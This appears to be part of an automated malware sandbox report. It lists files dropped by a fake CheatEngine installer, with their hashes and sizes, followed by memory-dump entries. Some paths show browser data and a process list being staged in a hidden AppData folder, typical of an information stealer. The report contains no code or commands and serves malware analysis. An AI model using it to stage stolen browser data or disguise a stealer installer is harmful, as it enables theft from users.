8106a4974f3453a1e894fec8939038a9692fd87096f716e5aa5895aa14ee1c187a9a9760c0d4aec7c1e0cc7614b4a2dbf9b6c297cc0f7a38ba47837bede3b296

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-OGMS8.tmp\CCleaner.png

Filesize
193KB

MD5
7c87614f099c75a0bed6ab01555143dd

SHA1
07ab72dc4a1e53e2c62ecccc1221472854d78635

SHA256
02335420cb5c2fa33eec48f32706d2353f8b609daaf337458f04a8f98d999a7c

SHA512
29b7ce896332ed2a05235645adb963b77920a0a252561684ea9f1f925f69dbcee4685e1b30584c1034a15b7efc18b911902d1ecb41c523cf2552ff23e165bf43

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-OGMS8.tmp\logo.png

Filesize
248KB

MD5
9cc8a637a7de5c9c101a3047c7fbbb33

SHA1
5e7b92e7ed3ca15d31a48ebe0297539368fff15c

SHA256
8c5c80bbc6b0fdb367eab1253517d8b156c85545a2d37d1ee4b78f3041d9b5db

SHA512
cf60556817dba2d7a39b72018f619b0dbea36fb227526943046b67d1ae501a96c838d6d5e3da64618592ac1e2fa14d4440baa91618aa66256f99ea2100a427b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-OGMS8.tmp\prod0.zip

Filesize
5.7MB

MD5
6406abc4ee622f73e9e6cb618190af02

SHA1
2aa23362907ba1c48eca7f1a372c2933edbb7fa1

SHA256
fd83d239b00a44698959145449ebfcb8c52687327deac04455e77a710a3dfe1b

SHA512
dd8e43f8a8f6c6e491179240bdfefdf30002f3f2900b1a319b4251dfa9ca7b7f87ddf170ba868ab520f94de9cc7d1854e3bcfd439cad1e8b4223c7ee06d649f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\v2.exe

Filesize
271KB

MD5
3f62213d184b639a0a62bcb1e65370a8

SHA1
bbf50b3c683550684cdb345d348e98fbe2fcafe0

SHA256
c692dfc29e70a17cabc19561e8e2662e1fe32fdba998a09fe1a8dc2b7e045b34

SHA512
0cd40d714e6a6ebd60cc0c8b0e339905a5f1198a474a531b1794fb562f27053f118718cc68b9652fef3411906f9d8ad22d0253af256fa1922133e9907298e803

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5TP8CVKC9FEI2D6A382F.temp

Filesize
7KB

MD5
75ceb8ff32e5a1e9cf3a14609d5e88e0

SHA1
008d04fbbe64922ae07394bf87ec40847fb11617

SHA256
11cf4fc5df169c51c320ee047baa8c83f5dd64b1b88185e97f829001b3bc3b9c

SHA512
dd8a5b54faede77443a9237072a6163cf6ce64b876ffcfeff8fa598c4b17f6ffdf826def13e28b90c22b431ed71f5f97c28fff9f9b10bb504cb949a4c0fc9e5b

Download Submit
C:\Users\Admin\AppData\Roaming\yPFCCJBVTGQ.Admin\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Roaming\yPFCCJBVTGQ.Admin\Process.txt

Filesize
468B

MD5
ba4fe1065a0b4171cc7b96747b0b6dab

SHA1
d02ca2381da1818714bf6d8edfc857a4a8c43cc3

SHA256
07335690226527b06a8921addd20edbbf30619b439d4876548a5485e672dbe87

SHA512
50e01ae76525391036104cebcef04db85e579d82d99cb6689f9eff22ed973228eec4b50c20e82a08b42dbe794274c51e1ad19845dd96ed082522748b26107499

Download Submit
\Users\Admin\AppData\Local\Temp\CheatEngine75.exe

Filesize
28.6MB

MD5
ccef241f10766a2e12298fba4d319450

SHA1
955c0a80105b034ed46941845fc9bdbe8187ee64

SHA256
590d28762bc431046a202d7bbafb31f93fbbbc73a3c2291119b5c1139675b579

SHA512
d20a8f5afab8cd819ab81875ba9dba5c5ebb9ceadf4d53bf19e1e99c4f16d1361aa272f49571c69c6cc375afc8ac2f9c2e0293b5f2bf62f85cc5c23dfb3923f2

Download Submit
\Users\Admin\AppData\Local\Temp\is-OGMS8.tmp\zbShieldUtils.dll

Filesize
2.0MB

MD5
3037e3d5409fb6a697f12addb01ba99b

SHA1
5d80d1c9811bdf8a6ce8751061e21f4af532f036

SHA256
a860bd74595430802f4e2e7ad8fd1d31d3da3b0c9faf17ad4641035181a5ce9e

SHA512
80a78a5d18afc83ba96264638820d9eed3dae9c7fc596312ac56f7e0ba97976647f27bd86ea586524b16176280bd26daed64a3d126c3454a191b0adc2bc4e35d

Download Submit
memory/408-346-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/408-332-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/844-264-0x0000000001E40000-0x0000000001E48000-memory.dmp

Filesize
32KB

Download
memory/844-263-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/1404-320-0x000000013FFC0000-0x0000000140352000-memory.dmp

Filesize
3.6MB

Download
memory/1404-315-0x000000013FFC0000-0x0000000140352000-memory.dmp

Filesize
3.6MB

Download
memory/1460-283-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/1460-282-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download
memory/1488-333-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-378-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-398-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-394-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-390-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-386-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-382-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-351-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-374-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-334-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-355-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-339-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-319-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-347-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1488-321-0x0000000000200000-0x0000000000220000-memory.dmp

Filesize
128KB

Download
memory/1744-311-0x0000000019E30000-0x000000001A112000-memory.dmp

Filesize
2.9MB

Download
memory/1900-271-0x00000000027D0000-0x00000000027D8000-memory.dmp

Filesize
32KB

Download
memory/1900-270-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/1904-21-0x0000000000400000-0x0000000002BF8000-memory.dmp

Filesize
40.0MB

Download
memory/2340-331-0x0000000003730000-0x0000000003870000-memory.dmp

Filesize
1.2MB

Download
memory/2340-327-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/2340-285-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/2340-300-0x0000000003730000-0x0000000003870000-memory.dmp

Filesize
1.2MB

Download
memory/2340-337-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/2340-305-0x0000000003730000-0x0000000003870000-memory.dmp

Filesize
1.2MB

Download
memory/2340-345-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/2340-376-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/2340-325-0x0000000003730000-0x0000000003870000-memory.dmp

Filesize
1.2MB

Download
memory/2340-307-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/2580-272-0x000000013FAF0000-0x000000013FE82000-memory.dmp

Filesize
3.6MB

Download
memory/2580-276-0x000000013FAF0000-0x000000013FE82000-memory.dmp

Filesize
3.6MB

Download
memory/2976-310-0x0000000000A20000-0x0000000000A28000-memory.dmp

Filesize
32KB

Download
memory/2976-309-0x000000001A080000-0x000000001A362000-memory.dmp

Filesize
2.9MB

Download
memory/3056-96-0x0000000005240000-0x00000000052A8000-memory.dmp

Filesize
416KB

Download
memory/3056-101-0x0000000004520000-0x0000000004540000-memory.dmp

Filesize
128KB

Download
memory/3056-70-0x00000000046B0000-0x0000000004742000-memory.dmp

Filesize
584KB

Download
memory/3056-55-0x0000000000110000-0x000000000015A000-memory.dmp

Filesize
296KB

Download
memory/3064-25-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3064-284-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download